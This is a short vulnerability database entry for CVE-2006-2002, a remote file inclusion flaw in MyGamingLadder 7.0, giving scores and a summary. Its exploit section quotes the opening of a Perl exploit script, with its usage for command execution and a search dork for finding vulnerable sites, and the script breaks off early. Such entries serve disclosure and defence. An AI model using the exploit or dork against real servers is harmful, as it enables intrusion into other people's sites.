5
CVSSv2

CVE-2006-2002

Published: 25/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

PHP remote file inclusion vulnerability in stats.php in MyGamingLadder 7.0 allows remote malicious users to execute arbitrary PHP code via a URL in the dir[base] parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

mygamingladder mygamingladder 7.0

Exploits

#!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedxcom web: wwwnukedxcom #Original advisory: wwwnukedxcom/?viewdoc=28 #Usage: ladderpl <host> <path> <cmd> #Dork: "Ladder Scripts by wwwmygamingladdercom" 40500 pages use IO::Socket; if(@ARGV < 3) ...